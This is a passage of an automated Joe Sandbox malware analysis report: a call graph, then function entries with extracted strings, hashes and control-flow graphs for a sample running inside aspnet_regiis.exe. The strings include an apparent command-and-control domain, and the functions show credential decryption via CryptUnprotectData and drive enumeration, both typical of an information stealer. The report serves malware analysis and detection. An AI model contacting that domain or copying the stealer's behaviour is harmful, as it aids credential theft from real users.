33ce1fe 15974->15975 15976 33ce14a 15974->15976 15975->15956 15976->15975 15978 33d0d90 LdrInitializeThunk 15976->15978 15978->15975 15979->15968 15980 33c4a7f CoSetProxyBlanket 16130 33cdc18 16131 33cdc1e RtlAllocateHeap 16130->16131 16132 33c1859 16135 33ac2a0 16132->16135 16134 33c185e CoSetProxyBlanket 16135->16134 16136 33b509d 16138 33b50c1 16136->16138 16137 33b5163 16138->16137 16140 33d0d90 LdrInitializeThunk 16138->16140 16140->16138 16141 33d13d5 16142 33d13e6 16141->16142 16144 33d143e 16142->16144 16148 33d0d90 LdrInitializeThunk 16142->16148 16147 33d0d90 LdrInitializeThunk 16144->16147 16146 33d156f 16147->16146 16148->16144 15986 339d0b0 15988 339d0c0 15986->15988 15987 339d277 ExitProcess 15988->15987 15989 339d0f1 GetCurrentThreadId 15988->15989 15990 339d272 15988->15990 15995 339d180 15989->15995 16005 33d0ca0 15990->16005 15992 339d24f GetForegroundWindow 15993 339d259 GetCurrentProcessId 15992->15993 15994 339d25f 15992->15994 15993->15994 16000 339e1c0 15994->16000 15995->15992 15997 339d236 ShellExecuteW 15995->15997 15997->15992 15998 339d264 15998->15990 16004 339f960 FreeLibrary 15998->16004 16001 339e200 16000->16001 16001->16001 16002 339e27e LoadLibraryExW 16001->16002 16003 339e293 16002->16003 16003->15998 16004->15990 16008 33d1d40 16005->16008 16007 33d0ca5 FreeLibrary 16007->15987 16009 33d1d49 16008->16009 16009->16007 16015 33d0676 16016 33d06c0 16015->16016 16016->16016 16017 33d0700 LoadLibraryExW 16016->16017 16018 33d071b 16017->16018 16149 33b4750 16150 33b475e 16149->16150 16153 33b47a0 16149->16153 16155 33b4860 16150->16155 16156 33b4870 16155->16156 16156->16156 16157 33d3f40 LdrInitializeThunk 16156->16157 16158 33b495f 16157->16158 16019 33d10f1 16020 33d1140 16019->16020 16020->16020 16021 33d126e 16020->16021 16023 33d0d90 LdrInitializeThunk 16020->16023 16023->16021 16159 33d12d1 16160 33d12f0 16159->16160 16162 33d132e 16160->16162 16163 33d0d90 LdrInitializeThunk 16160->16163 16163->16162 16024 33a5b37 16025 33a5b82 16024->16025 16030 33ac6e0 16025->16030 16031 33ac6f3 16030->16031 16032 33d3da0 LdrInitializeThunk 16031->16032 16033 33ac86d 16032->16033 16034 33a07f7 CoInitialize 16035 33a0800 CoInitialize 16034->16035 16036 33a090c 16035->16036 16037 33a0c5f CoUninitialize 16036->16037 16038 33a0c6f GetSystemDirectoryW 16036->16038 16039 33a091c CoInitializeSecurity 16036->16039 16040 33a093e 16036->16040 16078 33a0c65 16036->16078 16037->16078 16038->16040 16039->16037 16039->16038 16039->16040 16040->16037 16040->16038 16041 33cdc40 RtlFreeHeap 16040->16041 16042 33a0dac 16040->16042 16041->16040 16081 33b7230 16042->16081 16044 33a0f31 16045 339db20 20 API calls 16044->16045 16046 33a0f3b 16045->16046 16047 33b79a0 LdrInitializeThunk 16046->16047 16048 33a0f4d 16047->16048 16049 339db20 20 API calls 16048->16049 16050 33a0f57 16049->16050 16051 33b7b90 LdrInitializeThunk 16050->16051 16052 33a0f69 16051->16052 16053 339db20 20 API calls 16052->16053 16054 33a0f73 16053->16054 16055 33b9d00 RtlFreeHeap LdrInitializeThunk 16054->16055 16056 33a0f85 16055->16056 16057 33ba6d0 RtlFreeHeap LdrInitializeThunk 16056->16057 16058 33a0f8e 16057->16058 16059 33baa40 CopyFileW RtlFreeHeap LdrInitializeThunk 16058->16059 16060 33a0f97 16059->16060 16061 33bd360 LdrInitializeThunk 16060->16061 16062 33a0fa0 16061->16062 16063 339db20 20 API calls 16062->16063 16064 33a0faa 16063->16064 16065 339db20 20 API calls 16064->16065 16066 33a0fc6 16065->16066 16067 33beb60 6 API calls 16066->16067 16068 33a0fd8 16067->16068 16069 33c5210 6 API calls 16068->16069 16072 33a0fe1 16069->16072 16070 339db20 20 API calls 16071 33a0ffb CoUninitialize 16070->16071 16071->16072 16072->16070 16073 33a1459 16072->16073 16074 33cdc40 RtlFreeHeap 16072->16074 16075 339db20 20 API calls 16073->16075 16074->16072 16076 33a14f9 16075->16076 16077 33d0d90 LdrInitializeThunk 16076->16077 16076->16078 16079 33a17e1 16076->16079 16077->16079 16079->16078 16080 33d0d90 LdrInitializeThunk 16079->16080 16080->16078 16082 33b7250 16081->16082 16082->16082 16088 33d3f40 16082->16088 16084 33b75f1 GetLogicalDrives 16086 33d3f40 LdrInitializeThunk 16084->16086 16085 33b7480 16085->16084 16085->16085 16087 33b7605 16086->16087 16089 33d3f60 16088->16089 16090 33d40be 16089->16090 16092 33d0d90 LdrInitializeThunk 16089->16092 16090->16085 16092->16090 16093 33ad5af 16094 33ad5b4 16093->16094 16103 33d4110 16094->16103 16096 33ad6ce 16101 33ad863 CryptUnprotectData 16096->16101 16102 33ad88d 16096->16102 16097 33ad5ca 16097->16096 16099 33ad603 16097->16099 16097->16102 16107 33d41f0 16097->16107 16099->16096 16099->16102 16113 33d0d90 LdrInitializeThunk 16099->16113 16101->16102 16102->16102 16105 33d4140 16103->16105 16104 33d419e 16104->16097 16105->16104 16114 33d0d90 LdrInitializeThunk 16105->16114 16109 33d4210 16107->16109 16108 33d426e 16110 33d432e 16108->16110 16116 33d0d90 LdrInitializeThunk 16108->16116 16109->16108 16115 33d0d90 LdrInitializeThunk 16109->16115 16110->16099 16113->16096 16114->16104 16115->16108 16116->16110 16117 33d0f68 16118 33d0f71 GetForegroundWindow 16117->16118 16119 33d0f84 16118->16119 16120 33cdce0 16121 33cdd10 16120->16121 16121->16121 16124 33cdd9e 16121->16124 16128 33d0d90 LdrInitializeThunk 16121->16128 16122 33cdf63 16124->16122 16126 33cdece 16124->16126 16129 33d0d90 LdrInitializeThunk 16124->16129 16125 33cdc40 RtlFreeHeap 16125->16122 16126->16125 16128->16124 16129->16126 16165 33a00c5 16166 339fcc0 16165->16166 16168 339fcfd 16165->16168 16168->16166 16168->16168 16169 33d0cc0 16168->16169 16170 33d0cdc 16169->16170 16172 33d0cea 16169->16172 16171 33cdc40 RtlFreeHeap 16170->16171 16170->16172 16171->16172 16172->16168

                                                                            Executed Functions

                                                                            Function 033A0130 Relevance: 43.9, APIs: 4, Strings: 20, Instructions: 1884COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #Tw$7DEA0A49D8D68686C58ADC3142F6BB48$;:54$;:54$=i<o$F]$J!G'$K=C#$Noni$T1S7$U`3$V[$_]$`1d7$d5h;$f[zU$mafnufacut.cyou$xr${){/${-S
                                                                            • API String ID: 0-4031840133
                                                                            • Opcode ID: a82b9ed8bd979cb90a8ba0ac04c9085f9d8d2be4be68d23ba4f64388ef2f96de
                                                                            • Instruction ID: b23cf8e4c0be00c4da9be09a0ecf1d56734eaf288fbd1d686c6af80c1e54e1d2
                                                                            • Opcode Fuzzy Hash: a82b9ed8bd979cb90a8ba0ac04c9085f9d8d2be4be68d23ba4f64388ef2f96de
                                                                            • Instruction Fuzzy Hash: 11D220B5A047408FD724DF29D8D172ABBE1FF86304F1889ACD4D68F696D736A406CB81
                                                                            Function 033A011A Relevance: 29.8, APIs: 4, Strings: 12, Instructions: 1779COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #Tw$7DEA0A49D8D68686C58ADC3142F6BB48$;:54$;:54$F]$Noni$T1S7$V[$_]$f[zU$mafnufacut.cyou$xr
                                                                            • API String ID: 0-458242938
                                                                            • Opcode ID: 5e927755b05ddda52c10e8ad7ed0368758d89e9b8be3a2a8ea6d92bd84a3ef6f
                                                                            • Instruction ID: a320c88a8bcfaad7eb4110c5a76c6d10f721caca5ce322e9f5ff8fdea00611e0
                                                                            • Opcode Fuzzy Hash: 5e927755b05ddda52c10e8ad7ed0368758d89e9b8be3a2a8ea6d92bd84a3ef6f
                                                                            • Instruction Fuzzy Hash: 73C232B5A047408FD724DF29D8D1726BBE2FF86304F1885ACD4968F696D73AE406CB81
                                                                            Function 033BEB60 Relevance: 29.1, APIs: 5, Strings: 10, Instructions: 2801COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "JZ$'Rx/$*JZ$34t$ODIF$Y?^i$fjnr$kk$syrh$vNHF
                                                                            • API String ID: 0-2617420629
                                                                            • Opcode ID: bbddcb7dd66b118e28477bea64e294380ad5fff9f08f796546582d5f702fb6d5
                                                                            • Instruction ID: a21c0fe918775479aa2ccbc4db4bb6e3014c6992a5d762ab5a989d4c969914b7
                                                                            • Opcode Fuzzy Hash: bbddcb7dd66b118e28477bea64e294380ad5fff9f08f796546582d5f702fb6d5
                                                                            • Instruction Fuzzy Hash: 4313D374504B818BE725CF39C8D07A3BBE5AF57304F0889ADC1EB8B686D779A405CB61
                                                                            Function 033CA97E Relevance: 19.8, APIs: 9, Strings: 2, Instructions: 587memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1058 33ca97e-33ca993 1059 33ca9a0-33ca9de 1058->1059 1059->1059 1060 33ca9e0-33caa4f SysAllocString 1059->1060 1061 33caa50-33caa7b 1060->1061 1061->1061 1062 33caa7d-33caaa3 SysAllocString 1061->1062 1064 33cadfd-33cae0b SysFreeString * 2 1062->1064 1065 33cacfd-33cad0e 1062->1065 1066 33cac7f-33cac87 call 339c8c0 1062->1066 1067 33cadb4-33cadbb 1062->1067 1068 33cad36-33cad44 1062->1068 1069 33caab0-33caac8 1062->1069 1070 33cac30-33cac5c 1062->1070 1071 33cacb0 1062->1071 1072 33cad30 1062->1072 1073 33cacb2-33cacba 1062->1073 1074 33cac73-33cac76 1062->1074 1075 33caaee-33cab3a VariantInit 1062->1075 1076 33caaaa 1062->1076 1077 33cad20-33cad29 1062->1077 1078 33cada0-33cadad 1062->1078 1079 33caba1-33cabb4 1062->1079 1080 33cac63-33cac6c 1062->1080 1081 33cae58 1062->1081 1082 33cadd9-33cade0 1062->1082 1083 33cae50-33cae54 1062->1083 1084 33cadd1-33cadd8 1062->1084 1085 33cae0d-33cae1b SysFreeString * 2 1062->1085 1086 33cad4e-33cad76 call 33b23f0 1062->1086 1087 33cac8a-33caca4 VariantClear 1062->1087 1088 33cad4b 1062->1088 1089 33cadc0 1062->1089 1090 33cadc2-33cadca 1062->1090 1064->1085 1065->1067 1065->1068 1065->1072 1065->1077 1065->1078 1065->1081 1065->1083 1065->1084 1065->1086 1065->1088 1065->1089 1065->1090 1066->1087 1067->1089 1068->1067 1068->1078 1068->1081 1068->1083 1068->1086 1068->1088 1068->1089 1068->1090 1104 33caacc-33caae7 1069->1104 1070->1064 1070->1065 1070->1066 1070->1067 1070->1068 1070->1071 1070->1072 1070->1073 1070->1074 1070->1077 1070->1078 1070->1080 1070->1081 1070->1082 1070->1083 1070->1084 1070->1085 1070->1086 1070->1087 1070->1088 1070->1089 1070->1090 1072->1068 1073->1065 1074->1066 1096 33cab40-33cab76 1075->1096 1076->1069 1077->1067 1077->1068 1077->1072 1077->1078 1077->1081 1077->1083 1077->1086 1077->1088 1077->1089 1077->1090 1078->1067 1078->1078 1078->1081 1078->1083 1078->1089 1078->1090 1093 33cb148-33cb15b call 33d3da0 1078->1093 1094 33cb132-33cb145 call 33d3da0 1078->1094 1095 33cb0f2-33cb0f7 1078->1095 1097 33cabed-33cac1d call 339c8b0 call 33ba570 1079->1097 1098 33cabb6-33cabbe 1079->1098 1080->1064 1080->1065 1080->1066 1080->1067 1080->1068 1080->1070 1080->1071 1080->1072 1080->1073 1080->1074 1080->1077 1080->1078 1080->1080 1080->1081 1080->1082 1080->1083 1080->1084 1080->1085 1080->1086 1080->1087 1080->1088 1080->1089 1080->1090 1105 33cae5e 1081->1105 1100 33cade4-33cadf8 SysFreeString 1082->1100 1083->1081 1085->1083 1118 33cad80-33cad88 1086->1118 1087->1071 1088->1086 1090->1067 1090->1068 1090->1072 1090->1077 1090->1078 1090->1081 1090->1083 1090->1084 1090->1086 1090->1088 1090->1089 1090->1090 1090->1093 1090->1094 1090->1095 1094->1093 1095->1105 1109 33cb0ec 1095->1109 1110 33caf2c-33caf46 1095->1110 1111 33cb0fe-33cb103 1095->1111 1112 33cb11f-33cb129 call 33cdbb0 1095->1112 1113 33cb110 1095->1113 1114 33cb112-33cb11c call 33cdbb0 1095->1114 1096->1096 1107 33cab78-33cab85 1096->1107 1097->1064 1097->1065 1097->1066 1097->1067 1097->1068 1097->1070 1097->1071 1097->1072 1097->1073 1097->1074 1097->1077 1097->1078 1097->1080 1097->1081 1097->1082 1097->1083 1097->1084 1097->1085 1097->1086 1097->1087 1097->1088 1097->1089 1097->1090 1108 33cabcc-33cabd0 1098->1108 1100->1064 1104->1064 1104->1065 1104->1066 1104->1067 1104->1068 1104->1070 1104->1071 1104->1072 1104->1073 1104->1074 1104->1075 1104->1077 1104->1078 1104->1079 1104->1080 1104->1081 1104->1082 1104->1083 1104->1084 1104->1085 1104->1086 1104->1087 1104->1088 1104->1089 1104->1090 1123 33cae60-33cae67 1105->1123 1129 33cab89-33cab9a 1107->1129 1124 33cabc0 1108->1124 1125 33cabd2-33cabdb 1108->1125 1109->1095 1117 33caf50-33cafa3 1110->1117 1111->1113 1112->1094 1113->1114 1114->1112 1117->1117 1127 33cafa5-33cafb3 1117->1127 1118->1118 1133 33cad8a-33cad94 1118->1133 1130 33cabc1-33cabca 1124->1130 1131 33cabdd-33cabe0 1125->1131 1132 33cabe2-33cabe6 1125->1132 1137 33cafdc-33cafeb 1127->1137 1138 33cafb5-33cafbf 1127->1138 1129->1064 1129->1065 1129->1066 1129->1067 1129->1068 1129->1070 1129->1071 1129->1072 1129->1073 1129->1074 1129->1077 1129->1078 1129->1079 1129->1080 1129->1081 1129->1082 1129->1083 1129->1084 1129->1085 1129->1086 1129->1087 1129->1088 1129->1089 1129->1090 1130->1097 1130->1108 1131->1130 1132->1130 1139 33cabe8-33cabeb 1132->1139 1133->1067 1133->1078 1133->1081 1133->1083 1133->1089 1133->1090 1133->1093 1133->1094 1133->1095 1142 33caf1f-33caf26 call 33ce140 1137->1142 1143 33cae68-33cae7a 1137->1143 1144 33caf18-33caf1a call 33ce140 1137->1144 1145 33caef4-33caf0f call 33ce230 1137->1145 1146 33caf10 1137->1146 1147 33cae90-33cae9b 1137->1147 1148 33caff2-33cb00f call 33cdc40 1137->1148 1149 33caea2-33caeed call 33cdf80 call 33cdfb0 1137->1149 1150 33caf12 1137->1150 1141 33cafc0-33cafcc 1138->1141 1139->1130 1157 33cafce 1141->1157 1142->1110 1143->1142 1143->1144 1143->1145 1143->1146 1143->1147 1143->1148 1143->1149 1143->1150 1144->1142 1145->1146 1147->1142 1147->1144 1147->1145 1147->1146 1147->1147 1147->1148 1147->1149 1147->1150 1162 33cb010-33cb065 1148->1162 1149->1142 1149->1144 1149->1145 1149->1146 1149->1147 1149->1150 1157->1137 1162->1162 1164 33cb067-33cb06f 1162->1164 1166 33cb0aa-33cb0af 1164->1166 1167 33cb071-33cb07f 1164->1167 1166->1123 1168 33cb080-33cb08c 1167->1168 1170 33cb08e 1168->1170 1170->1166
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: AllocString
                                                                            • String ID: ;:54$;:54
                                                                            • API String ID: 2525500382-2193779323
                                                                            • Opcode ID: 7a53a2f8b9e98f51432602f9b08014eb44696df175800539962862a8d1f645e5
                                                                            • Instruction ID: e2480605accd08b4820d9c179e2a9b0d6719c7cd479caf8cd00f3ea9b60d6de9
                                                                            • Opcode Fuzzy Hash: 7a53a2f8b9e98f51432602f9b08014eb44696df175800539962862a8d1f645e5
                                                                            • Instruction Fuzzy Hash: B812EE76A10601DFD724DF24E8D0A2AB7BAFF89310F18866CD4569B794D735E812CB90
                                                                            Function 033B6800 Relevance: 11.7, APIs: 1, Strings: 5, Instructions: 1152COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;:54$InA>$InA>$P$SV
                                                                            • API String ID: 0-1927751682
                                                                            • Opcode ID: d0f413ad77fbf2423d53bb3cb1f12b861819ebaaa2242c76135a5a6a9dfec8f0
                                                                            • Instruction ID: 12a1a829b09e58c339bd6912b0abbc3b1dcb0d42ff26428354fe99e56a0137c4
                                                                            • Opcode Fuzzy Hash: d0f413ad77fbf2423d53bb3cb1f12b861819ebaaa2242c76135a5a6a9dfec8f0
                                                                            • Instruction Fuzzy Hash: 4C824676E01215CFDB18CF68D8C16AEB7B6FF49310F1A8168DA41AB395D734A852CF90
                                                                            Function 033AD5AF Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 404encryptionCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1469 33ad5af-33ad5da call 339c8c0 call 33d4110 1474 33ad63e-33ad644 call 339c8c0 1469->1474 1475 33ad88d 1469->1475 1476 33ad652-33ad66b 1469->1476 1477 33ad612 1469->1477 1478 33ad8b2 1469->1478 1479 33ad620-33ad634 call 3393d70 1469->1479 1480 33ad650 1469->1480 1481 33ad5e1-33ad60b call 339c8b0 call 33d41f0 1469->1481 1482 33ad647-33ad64f 1469->1482 1483 33ad7b5-33ad7bb 1469->1483 1474->1482 1475->1478 1486 33ad670-33ad69d 1476->1486 1477->1479 1479->1474 1480->1476 1481->1474 1481->1475 1481->1476 1481->1477 1481->1478 1481->1479 1481->1480 1481->1482 1481->1483 1482->1480 1487 33ad7c0-33ad7c6 1483->1487 1486->1486 1492 33ad69f-33ad6ae 1486->1492 1487->1487 1493 33ad7c8-33ad7e4 1487->1493 1495 33ad6ea-33ad751 call 33946d0 1492->1495 1496 33ad6b0-33ad6bf 1492->1496 1497 33ad7eb 1493->1497 1498 33ad7e6-33ad7e9 1493->1498 1510 33ad760-33ad795 1495->1510 1501 33ad6c0-33ad6c7 1496->1501 1502 33ad7ec-33ad803 1497->1502 1498->1497 1498->1502 1506 33ad6c9-33ad6cc 1501->1506 1507 33ad6d0-33ad6d6 1501->1507 1503 33ad80a 1502->1503 1504 33ad805-33ad808 1502->1504 1509 33ad80b-33ad821 call 339c8b0 1503->1509 1504->1503 1504->1509 1506->1501 1511 33ad6ce 1506->1511 1507->1495 1508 33ad6d8-33ad6e7 call 33d0d90 1507->1508 1508->1495 1518 33adb1a-33adb21 1509->1518 1519 33ad827-33ad886 call 33d33b0 CryptUnprotectData 1509->1519 1510->1510 1514 33ad797-33ad7ae call 3394810 1510->1514 1511->1495 1514->1475 1514->1478 1514->1483 1522 33adb48-33adb97 call 33b1a20 * 2 1518->1522 1519->1475 1526 33adc21-33adc2b 1519->1526 1533 33adb38-33adb42 1522->1533 1534 33adb99-33adbb0 call 33b1a20 1522->1534 1528 33adc30-33adc39 1526->1528 1528->1528 1530 33adc3b-33adc42 1528->1530 1531 33add58 1530->1531 1532 33adc48-33adc4d 1530->1532 1535 33add5b-33adda8 call 339c8b0 1531->1535 1532->1535 1533->1519 1533->1522 1540 33adb30-33adb34 1534->1540 1541 33adbb6-33adbdf 1534->1541 1542 33addb0-33adddb 1535->1542 1540->1533 1543 33adc18-33adc1c 1541->1543 1544 33adbe1-33adbf9 call 33b1a20 1541->1544 1542->1542 1545 33adddd-33added 1542->1545 1543->1533 1553 33adbfb-33adc0c 1544->1553 1554 33adc0d-33adc13 1544->1554 1547 33addef-33addf4 1545->1547 1548 33ade11-33ade21 1545->1548 1550 33ade00-33ade0f 1547->1550 1551 33ade43 1548->1551 1552 33ade23-33ade2f 1548->1552 1550->1548 1550->1550 1556 33ade46-33ade5b call 339d2d0 1551->1556 1555 33ade30-33ade3f 1552->1555 1553->1554 1554->1533 1555->1555 1557 33ade41 1555->1557 1557->1556
                                                                            APIs
                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 033AD87D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: CryptDataUnprotect
                                                                            • String ID: ;:54$J$r
                                                                            • API String ID: 834300711-2889753551
                                                                            • Opcode ID: 0a5885051481e1dc10eb7bbfc0a091e4ff16c19c87186cfbf8b3c6599c18efb9
                                                                            • Instruction ID: 3292ae458695d30f3db43cb691e1e5cf021cea1e507b30086e2f62cba15dda27
                                                                            • Opcode Fuzzy Hash: 0a5885051481e1dc10eb7bbfc0a091e4ff16c19c87186cfbf8b3c6599c18efb9
                                                                            • Instruction Fuzzy Hash: 20D145B69083408FD724DF28D8E07ABB7E5EF96304F08896DE4DA8B751D7709941CB82
                                                                            Function 033B6F82 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 524COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1608 33b6f82-33b6f8e 1609 33b6fe0 1608->1609 1610 33b6fa0-33b6faf 1608->1610 1611 33b6fb6-33b6fd7 1608->1611 1612 33b6ed5-33b6eec 1608->1612 1613 33b6fe5-33b6ff7 1608->1613 1609->1613 1610->1609 1610->1611 1610->1612 1610->1613 1611->1609 1612->1610 1614 33b6ef9 1612->1614 1615 33b70af-33b70bb 1612->1615 1616 33b6ef3 1612->1616 1617 33b70c2-33b70d5 1612->1617 1618 33b6f32-33b6f3c 1612->1618 1619 33b6f61-33b6f69 1612->1619 1620 33b6f00 1612->1620 1621 33b6f50-33b6f58 1612->1621 1622 33b70f7-33b7108 1612->1622 1623 33b6f06-33b6f2b 1612->1623 1624 33b7000-33b7024 1613->1624 1614->1620 1615->1610 1615->1614 1615->1617 1615->1618 1615->1619 1615->1620 1615->1621 1615->1622 1615->1623 1616->1614 1617->1622 1625 33b725b-33b72b2 1617->1625 1626 33b713a-33b714f 1617->1626 1627 33b710f 1617->1627 1628 33b748f-33b7495 1617->1628 1629 33b7162-33b716c 1617->1629 1630 33b7111-33b712a 1617->1630 1631 33b7131-33b7138 1617->1631 1632 33b7160 1617->1632 1633 33b7250-33b7259 1617->1633 1635 33b70e0-33b70f0 1617->1635 1618->1609 1618->1611 1618->1612 1618->1613 1618->1621 1619->1610 1620->1623 1621->1619 1622->1625 1622->1626 1622->1627 1622->1628 1622->1629 1622->1630 1622->1631 1622->1632 1622->1633 1623->1610 1623->1618 1623->1619 1623->1621 1624->1624 1634 33b7026-33b702e 1624->1634 1636 33b72c0-33b72f5 1625->1636 1651 33b7152-33b7157 1626->1651 1627->1630 1646 33b749e-33b74a6 1628->1646 1630->1625 1630->1626 1630->1628 1630->1629 1630->1631 1630->1632 1630->1633 1631->1651 1633->1625 1637 33b6ecf 1634->1637 1638 33b7034-33b7042 1634->1638 1635->1622 1635->1625 1635->1626 1635->1627 1635->1628 1635->1629 1635->1630 1635->1631 1635->1632 1635->1633 1636->1636 1641 33b72f7-33b733a 1636->1641 1639 33b6ed2 1637->1639 1642 33b7050-33b7057 1638->1642 1639->1612 1657 33b733c-33b7341 1641->1657 1658 33b7343 1641->1658 1649 33b7059-33b705c 1642->1649 1650 33b7063-33b7069 1642->1650 1647 33b74a8-33b74ad 1646->1647 1648 33b74af 1646->1648 1652 33b74b6-33b7555 call 339c8b0 1647->1652 1648->1652 1649->1642 1654 33b705e 1649->1654 1650->1639 1655 33b706f-33b70a8 call 33d0d90 1650->1655 1651->1632 1663 33b7560-33b7595 1652->1663 1654->1639 1655->1610 1655->1614 1655->1615 1655->1616 1655->1617 1655->1618 1655->1619 1655->1620 1655->1621 1655->1622 1655->1623 1661 33b7346-33b736b call 339c8b0 1657->1661 1658->1661 1675 33b736d 1661->1675 1676 33b7374-33b73ba call 339c8b0 1661->1676 1663->1663 1665 33b7597-33b75a3 1663->1665 1667 33b75c1-33b75d5 1665->1667 1668 33b75a5-33b75af 1665->1668 1670 33b75f1-33b760f GetLogicalDrives call 33d3f40 1667->1670 1671 33b75d7-33b75da 1667->1671 1669 33b75b0-33b75bf 1668->1669 1669->1667 1669->1669 1679 33b786b 1670->1679 1680 33b7616-33b761e 1670->1680 1673 33b75e0-33b75ef 1671->1673 1673->1670 1673->1673 1675->1676 1682 33b73c0-33b7407 1676->1682 1683 33b786d 1679->1683 1680->1679 1682->1682 1684 33b7409-33b7417 1682->1684 1683->1683 1685 33b7419-33b7421 1684->1685 1686 33b7441-33b744d 1684->1686 1687 33b7430-33b743f 1685->1687 1688 33b744f-33b7452 1686->1688 1689 33b7471-33b747b call 33d3f40 1686->1689 1687->1686 1687->1687 1690 33b7460-33b746f 1688->1690 1692 33b7480-33b7488 1689->1692 1690->1689 1690->1690 1692->1628 1692->1646
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
